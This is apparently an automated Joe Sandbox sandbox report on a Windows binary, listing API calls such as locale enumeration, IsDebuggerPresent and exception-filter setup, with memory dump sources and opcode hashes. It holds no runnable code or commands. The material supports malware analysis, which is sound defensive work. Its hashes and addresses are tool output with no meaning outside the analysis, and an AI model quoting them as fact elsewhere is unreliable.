                                                                                                          • Opcode Fuzzy Hash: 78175d207d574091934a7592aa1e842fcd458cb9563c0b0ff874f39b307ac418
                                                                                                          • Instruction Fuzzy Hash: C531F6B5D01228DBDB20DFA4D9497CDBBF8BF08304F1041AAE40CAB290EB759A85CF45
                                                                                                          APIs
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00707122
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00707131
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0070713A
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00707147
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2933794660-0
                                                                                                          • Opcode ID: 1ca631b08941f6e611e4c5c0a8f35fae09088aaf9a4e50f2b2c354fb56ec46ad
                                                                                                          • Instruction ID: cc8fd1b6191f6dfe60357389f2a8085f48c15b0e831928cf8186e94ae8f9a47d
                                                                                                          • Opcode Fuzzy Hash: 1ca631b08941f6e611e4c5c0a8f35fae09088aaf9a4e50f2b2c354fb56ec46ad
                                                                                                          • Instruction Fuzzy Hash: 00F0B270C0020DEBCB14DBF4CA8899EBBF4EF1D200B918595A412F7110E734AB458B50
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0071871F
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00718769
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0071882F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 661929714-0
                                                                                                          • Opcode ID: d35c2297e83fb05a775c9592bc4e00488556b1ae01955623cab1d7acf657e87e
                                                                                                          • Instruction ID: ce566433f762a6056b9d67a31e3cf4876f06b6ee2e0c75ac0ee7b13f1fb61ee3
                                                                                                          • Opcode Fuzzy Hash: d35c2297e83fb05a775c9592bc4e00488556b1ae01955623cab1d7acf657e87e
                                                                                                          • Instruction Fuzzy Hash: 69618C71A102179BDB689F2CCC86BEA77A9EF04300F5441B9E915C62C1EB78DAC1CB51
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0070F3A8
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0070F3B2
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0070F3BF
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 86e3c4d615212208485e4aea71ea94099dfefd3079c86c9f48e02bcff8bf57e6
• Instruction ID: 16a8cd9e88f38f479ea972437f8e271d0d8d7a1dcd323fc7924e15de46e368e4
• Opcode Fuzzy Hash: 86e3c4d615212208485e4aea71ea94099dfefd3079c86c9f48e02bcff8bf57e6
• Instruction Fuzzy Hash: 2F319075911228DBCB21DF64D889B9DBBF8BF08310F5082EAE41CA6291E7749B85CF44
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,0070E2A3,?,20001004,00000000,00000002,?,?,0070D1B5), ref: 00713EE0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: InfoLocale
• String ID: &p
• API String ID: 2299586839-2011850372
• Opcode ID: b5a347e5666714d4735767ecae2363cafee32660c17dda1e691f5584c8cf1947
• Instruction ID: 8c49f18784200eb1487853a168e60ff4d69e22d54ba119e3404c993c09ac80ae
• Opcode Fuzzy Hash: b5a347e5666714d4735767ecae2363cafee32660c17dda1e691f5584c8cf1947
• Instruction Fuzzy Hash: 48E04F31500218FBCF326F65DC08AEE3E56EF487A0F144411FD09662A0CB3ECE61AB94
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0071CCF2,?,?,00000008,?,?,0072318B,00000000), ref: 0071CFC4
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 21535f1f760f8cc43c3c8d2f86473194e1212b5fbddb0c72c70cec244272ecd0
• Instruction ID: af86691c6bf59843804866fe46e37058d04c49fc32cd52b5519ec18ab2620002
• Opcode Fuzzy Hash: 21535f1f760f8cc43c3c8d2f86473194e1212b5fbddb0c72c70cec244272ecd0
• Instruction Fuzzy Hash: 88B12A326106089FD715CF6CC48ABA57BA1FF49364F258658E999CF2E1C339DD92CB40
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007061AA
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 66254dbf07ba5f98cdfc5c8a234c26c885d332361631aa74e1acfd880ac5646e
• Instruction ID: a37ebf87c7b5231cc2f5d95776b781541a98f04994c71d624e2e9ef825171455
• Opcode Fuzzy Hash: 66254dbf07ba5f98cdfc5c8a234c26c885d332361631aa74e1acfd880ac5646e
• Instruction Fuzzy Hash: B4A15CB1A14745CFEB18CF54D8B16A9BBF1FB58325F24D62AD401E72A0D338A950CF94
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 46c0d3cf4716e6af21954a6c5105bcf2ba9f673035f8e21b5042299e40b40c11
• Instruction ID: 65e376711aa53640ffffa5309543b109cb35de120309aa1237aa24611242a431
• Opcode Fuzzy Hash: 46c0d3cf4716e6af21954a6c5105bcf2ba9f673035f8e21b5042299e40b40c11
• Instruction Fuzzy Hash: 52C1AEB490060ACFCB26CFA8C9946BABBF1FF09314F148759E492976D2C339AD45CB51
APIs
  • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
  • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007189D1
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: f04cd9d5eda0fc56d5be1bbac631a39196704ac1767e3f6e7b2d57a8b6123de5
• Instruction ID: f6f92e39ad074c31ac6396c6625ad4097c07a11b47e9a89d62c4a84dcff4b6ec
• Opcode Fuzzy Hash: f04cd9d5eda0fc56d5be1bbac631a39196704ac1767e3f6e7b2d57a8b6123de5
• Instruction Fuzzy Hash: 60218372615206ABDB289A2CDC55AFA77A8EF04354F14407AFD01D62C1EF7CED808A51
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 9986ef7650725eb17fa9e14fcae2b236755a30b390f5513a54414da1149a07b9
• Instruction ID: 2c92a0ea9242a00d18d598128f490c119bf36300c0023dd4f7672d8c740b4c13
• Opcode Fuzzy Hash: 9986ef7650725eb17fa9e14fcae2b236755a30b390f5513a54414da1149a07b9
• Instruction Fuzzy Hash: 5BB1CF70A0070BEBCB25CE68C55AABFB7F1AF01300F144B19E49297AD5D739EA41CB52
APIs
  • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
  • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
• EnumSystemLocalesW.KERNEL32(007186CB,00000001,00000000,?,-00000050,?,007184BB,00000000,-00000002,00000000,?,00000055,?), ref: 007186A2
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: fe41645b35e02da4ecb1c4297cc1b4aec8f322e25a8ecebd73474df4319e0af0
• Instruction ID: bc89011a0bf9c2fa39b064391cbd5e20a3503eec00fa35c62b0ae677d783e027
• Opcode Fuzzy Hash: fe41645b35e02da4ecb1c4297cc1b4aec8f322e25a8ecebd73474df4319e0af0
• Instruction Fuzzy Hash: 0E11293A2007019FDB289F3CD8916FAB791FF80318B15442CE94787681E779B982C740
APIs
  • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
  • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00718AF1
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 8c08276efd1569ad44b7c5b9ec48e09fc6ca01f7abaa342adc5d877d9ce156e7
• Instruction ID: 0e032c92d68f3a065a115dbdb4b541c0fcc6c3731e155ef8b5bf0e369b9ae78b
• Opcode Fuzzy Hash: 8c08276efd1569ad44b7c5b9ec48e09fc6ca01f7abaa342adc5d877d9ce156e7
• Instruction Fuzzy Hash: A811A3B26155069BDB249B2CDC46AFA73E8EF04310B10417AF906D72C1EF7CEE418791
APIs
  • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
  • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,007188E7,00000000,00000000,?), ref: 00718C76
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 835c14b8498299847e1ea97061d196f4a29eba6ec12966efb12f23ceaf7edd35
• Instruction ID: 162f159ad2405537fead70d9aa2a35ead533bbab7741a02d52e0b00bf4fa2bc4
• Opcode Fuzzy Hash: 835c14b8498299847e1ea97061d196f4a29eba6ec12966efb12f23ceaf7edd35
• Instruction Fuzzy Hash: 5001D632A00612ABDB785F28C8467FA7768DB40394F154469AC46A32C0EE7CFF81C6F1
APIs
  • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
  • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
• EnumSystemLocalesW.KERNEL32(0071897D,00000001,?,?,-00000050,?,00718483,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00718968
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: d04f09c8e83b6d75e6a4f06604190d674e9e5ed6331859e763b1a9313fe1446c
• Instruction ID: 37fcba3d927640a90c5c8b84acb6b69e649e49530db0be325057e43da8a7fe7b
• Opcode Fuzzy Hash: d04f09c8e83b6d75e6a4f06604190d674e9e5ed6331859e763b1a9313fe1446c
• Instruction Fuzzy Hash: A6F0F6363003045FDB245F3DDC85ABA7B91EF80368F15842DF9458B6D0DABAAC82CB51
APIs
  • Part of subcall function 0070F547: EnterCriticalSection.KERNEL32(?,?,0070CD41,00000000,0072E728,0000000C,0070CCFA,00001000,?,007144CA,00001000,?,007135B1,00000001,00000364,?), ref: 0070F556
• EnumSystemLocalesW.KERNEL32(0071439A,00000001,0072EBA0,0000000C,00713DA8,-00000050), ref: 007143DF
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 5003367f97003b74aebbb47c2fd384157e7e5702dbece5dcbc3a55790230483a
• Instruction ID: 9761c2d3b406e5fb719473370ae60b4db7114da25c920829923f57f2c41bcaca
• Opcode Fuzzy Hash: 5003367f97003b74aebbb47c2fd384157e7e5702dbece5dcbc3a55790230483a
• Instruction Fuzzy Hash: A9F03772A00214DFEB14EF98E846B9E77F0FB08725F10826AE4119B2E1D7795941CF54
APIs
  • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
  • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
• EnumSystemLocalesW.KERNEL32(00718A9D,00000001,?,?,?,007184DD,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00718A89
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 3db87f0f58c50d49b43366e1159963f8f8af40b95d38f23b368ac87c94414d95
• Instruction ID: 7241fc9e53442abe5f82861563e1065e7fdb6072be09268bfa802da6013a2587
• Opcode Fuzzy Hash: 3db87f0f58c50d49b43366e1159963f8f8af40b95d38f23b368ac87c94414d95
• Instruction Fuzzy Hash: A8F0E53670020697CB149F79EC496AA7F94EFC1724B1A805AEA058B290CA7999C2C790
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001663D), ref: 00706521
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 668712c78d0497d4ed32648897e25115445603ef4697cfa78275fbc18d31f622
• Instruction ID: f1880dbd6a3abe2d91e49a1b9e14345e2262e407c5eb8a7f0bbfdb6dc77dc342
• Opcode Fuzzy Hash: 668712c78d0497d4ed32648897e25115445603ef4697cfa78275fbc18d31f622
• Instruction Fuzzy Hash:
APIs
Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f0000_external.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 12d249f456562637b17df62bc653dc56a9441f6e309ae65a52307e941c25c063
• Instruction ID: c7ec1d8044431e2b85ce776aaecdccb5f75bf8018eb7bffdfe06b7e4466af538
• Opcode Fuzzy Hash: 12d249f456562637b17df62bc653dc56a9441f6e309ae65a52307e941c25c063
• Instruction Fuzzy Hash: 3AA001706022058BA7648F35AB0A3193AA9EA86692B158069A549C5161EA2CA8929A09
                                                                                                          Memory Dump Source
• Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
